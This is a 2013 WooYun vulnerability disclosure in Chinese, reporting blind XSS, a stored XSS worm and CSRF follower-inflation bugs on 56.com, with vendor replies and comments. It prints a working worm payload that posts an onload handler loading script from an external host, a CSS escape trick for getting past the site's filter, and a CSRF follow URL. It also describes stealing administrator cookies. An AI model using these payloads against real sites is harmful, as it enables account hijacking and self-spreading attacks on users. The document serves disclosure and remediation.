当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023929

漏洞标题:咻,来个56.com的漏洞大礼包

相关厂商:56.com

漏洞作者: px1624

提交时间:2013-05-17 09:28

修复时间:2013-07-01 09:28

公开时间:2013-07-01 09:28

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-17: 细节已通知厂商并且等待厂商处理中
2013-05-17: 厂商已经确认,细节仅向厂商公开
2013-05-27: 细节向核心白帽子及相关领域专家公开
2013-06-06: 细节向普通白帽子公开
2013-06-16: 细节向实习白帽子公开
2013-07-01: 细节向公众公开

简要描述:

来个56.com的漏洞大礼包(xss盲打、xss盗号、蠕虫、csrf刷粉丝)。
漏洞大礼包是有了,礼物大礼包有木有!~(*^__^*) 嘻嘻

详细说明:

漏洞一:56网视频小镇问卷调查xss盲打。
1 问卷调查地址:

http://huodong.56.com/2013/diaocha/index.php?id=25


问卷调查的内容中,存在有输入框的位置没有过滤xss,可以插xss盲打后台。

1.png


2 成功收到管理员的cookie。

2.png


3 由于下午4点收到的cookie,而我是晚上10点才看到,所以后台cookie已经失效了(也有可能是他那边退出登录了)。

3.png


4 但是前台还是可以登录额。

4.png


漏洞二:56我秀首页 发布新鲜事 储存xss,可以蠕虫。
1 56秀地址:

http://xiu.56.com/

发布新鲜事位置,的图片src属性没有过滤"和onxxx

5.jpg


2 发布一条带有图片的新鲜事,抓包如下(post数据):

http://xiu.56.com/index.php?action=SnsApi&do=Publish
text	
img   http://c.p313.56img.com/photo2video/upImg/d1/68/2/thumb_kjtest09_5194f16315b20269.jpg
t	0.9721063207834959
isdefault	1
newyear_topic	0
video


然后修改post数据包为下图,插入xss代码。

6.png


3 可以看到成功的种植了调用外部js的xss代码。

7.png


4 试试抓下cookie,ok完全无压力。

8.png


5 试试蠕虫利用。
外部js文件中代码为(网站有调用jq):

jQuery.post("http://xiu.56.com/index.php?action=SnsApi&do=Publish",{
	"text":"",	
	"img":"http://c.p313.56img.com/photo2video/upImg/d1/68/2/thumb_kjtest09_5194f16315b20269.jpg\" onload=\"with(document)body.appendChild(createElement('script')).src='//px1624.sinaapp.com/t.js'",
	"t":"0.9721063207834959",
	"isdefault":1,
	"newyear_topic":0,
	"video":""	
})


换个浏览器换自己帐号去测试(刚才一直都是用那个xss到的管理账户在试)。
成功发布了一条带有xss蠕虫的图片的新鲜事。

9.jpg


6 这个漏洞我在提交乌云之前私下告诉了56乌云管理人员,当时说好,先不修补,等我截图完了再修。
没想到有的图我都没截,他就给修补了。
将onxxx过滤成了on<x>xxx,同时过滤了一些其他的关键字,以及图片地址判断了后缀等。

14.png


目前新鲜事首页的xss已经被修补了,不过不得不说56安全人员的安全意识啊(估计是直接随便弄了个过滤xss的js文件调用了一下),修补后照片墙位置的xss蠕虫还在。
我在提交乌云之前,又一次好心的去告诉了下他,所以不知道这个位置的现在还存在没。
照片墙测试地址:

http://xiu.56.com/index.php?action=Sns&do=photoWall&uid=kjtest09


10.png


而且这种修补治标不治本,我随便试了试,又给绕过了,不好意思。
利用style的expression,虽然这里expression也被过滤为了ex<x>pression。
但是重要的是,这里没有过滤 \ ,反斜线, 而 css里,允许使用转义字符, \ + ascii16进制形式。这样一来,我们就可以构造利用语句啦。
将expression写成ex\70ression即可成功绕过。至于那个后缀的判断,直接post数据后面多加个 .jpg 就给绕过了额。。。

16.png


18.png


看了一下,网站源码中还有句这个,就是把所有的IE浏览器都当作是IE7来执行,所以这个expression的xss就通杀所有的IE浏览器了。

17.png


下面是IE10下的成功xss弹窗。

19.png


诶,这。。。这岂不是又可以继续蠕虫了。
漏洞不可怕,可怕的就是厂商错误的修补。然后漏洞被公开后,被恶意份子进行了二次利用。
漏洞三:56我秀加关注csrf刷粉丝。
1 位置就是任意位置点击加关注。

11.jpg


2 抓包发现加关注是个get请求,具体形式如下,很明显可以用来刷粉丝。

http://xiu.56.com/index.php?action=SnsApi&do=DoFollow&attr=follow&t=0.8027756286319345&follow_user_id=用户名


3 去发个带有csrf的图,然后用另外一个帐号去访问那个会显示图片的地址。

12.png


4 成功执行了csrf,关注成功。

13.png


不一会儿,一大波粉丝就来了额。。

15.png

漏洞证明:

看上面。

修复方案:

漏洞一:过滤掉调查问卷中输入框位置的xss代码><"'/\&#这些特殊字符。
漏洞二:这个要过滤的本质是"号
漏洞三:get请求变为post请求,加token,判断refer。
PS:修补漏洞,还是认真专业点好,不要随便调用一个,八百年前的过滤xss的js库来骗自己额。。。
最后,求,礼物大礼包,这个可以有额~

版权声明:转载请注明来源 px1624@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2013-05-17 10:53

厂商回复:

非常感谢,已安排修复中。

最新状态:

2013-05-17:对不起px1624, 因为我们的操作失误这个漏洞Rank错选成了4, 如果可以重来的话我愿意给20.. 我们私聊下吧...

漏洞评价:

评论

  1. 2013-05-17 09:34 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    楼主不去哇蘑菇街的真可惜了

  2. 2013-05-17 09:42 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @梧桐雨 ??肿么了?

  3. 2013-05-17 09:46 | z@cx ( 普通白帽子 | Rank:434 漏洞数:44 | 。-。-。)

    @梧桐雨 @px1624 难道是因为蘑菇街妹子多???

  4. 2013-05-17 09:47 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    @z@cx 洞主喜欢礼物啊,蘑菇街挖一个送一个,丁香园也是。

  5. 2013-05-17 09:49 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @梧桐雨 额。。。

  6. 2013-05-17 10:27 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    礼物大礼包木有!

  7. 2013-05-17 12:06 | xiaoxin ( 实习白帽子 | Rank:72 漏洞数:9 | 无)

    如果可以重来的话我愿意

  8. 2013-05-17 12:07 | 0x2b ( 实习白帽子 | Rank:51 漏洞数:12 )

    px1624 别哭 看着他撸

  9. 2013-05-17 12:21 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @56.com 额、、、又是你们的失误额、、、我还能再相信你们么。。。4rank 这让我情何以堪啊、、呜呜~

  10. 2013-05-17 13:21 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    亲爱的,大礼包换来4rank,@56.com 他没杀了你算他爱你了。

  11. 2013-05-17 13:23 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @小胖子 唉、、想死的心都有了。。帖子编辑了好久,内容就写了100多行、、、擦

  12. 2013-05-17 14:38 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @px1624 人家说跟你私聊,就是有东西,偷着乐吧。

  13. 2013-05-18 00:33 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @小胖子 唉、、马上就快到第一页了,这个4rank对我影响很大啊。。。

  14. 2013-05-18 02:55 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @px1624 哈哈哈哈,屌丝,最近我在玩儿另外一个好玩儿的事情~

  15. 2013-05-18 16:01 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @小胖子 what?

  16. 2013-05-27 08:35 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    如果可以的话,你可以把分转我号里— —

  17. 2013-06-16 16:30 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    写了这么多才4rank 同情洞主的遭遇。。

  18. 2013-06-17 07:50 | sky ( 实习白帽子 | Rank:94 漏洞数:30 | 有一天,我带着儿子@jeary 去@园长 的园长...)

    4rank 为洞主默哀4秒钟...

  19. 2013-06-17 12:15 | J4mins ( 实习白帽子 | Rank:39 漏洞数:12 | Location: London,Ontario)

    Rank才4啊.. 不好吧

  20. 2013-06-17 18:16 | NoKing ( 路人 | Rank:15 漏洞数:2 | 一个垃圾罢了)

    。。。我只想知道,私聊的结果是什么。。。。

  21. 2013-06-18 08:07 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    4rank..!

  22. 2013-06-18 11:14 | 浮生 ( 路人 | Rank:12 漏洞数:4 | 浮生偷得半日闲)

    - - 对不起px1624, 因为我们的操作失误这个漏洞Rank错选成了4, 如果可以重来的话我愿意给20.. 我们私聊下吧...

  23. 2013-06-18 12:26 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @NoKing 送了个女式脱毛器。。。

  24. 2013-06-19 08:51 | NoKing ( 路人 | Rank:15 漏洞数:2 | 一个垃圾罢了)

    @px1624 我决定了。。。56.com的漏洞,我就无视了。。。。。

  25. 2013-07-01 10:00 | B1acken ( 普通白帽子 | Rank:174 漏洞数:29 | 渣渣)

    4RANK,洞主节哀

  26. 2013-07-01 10:12 | 松子 ( 实习白帽子 | Rank:45 漏洞数:5 | 无事)

    @px1624 你可以用来脱腿毛。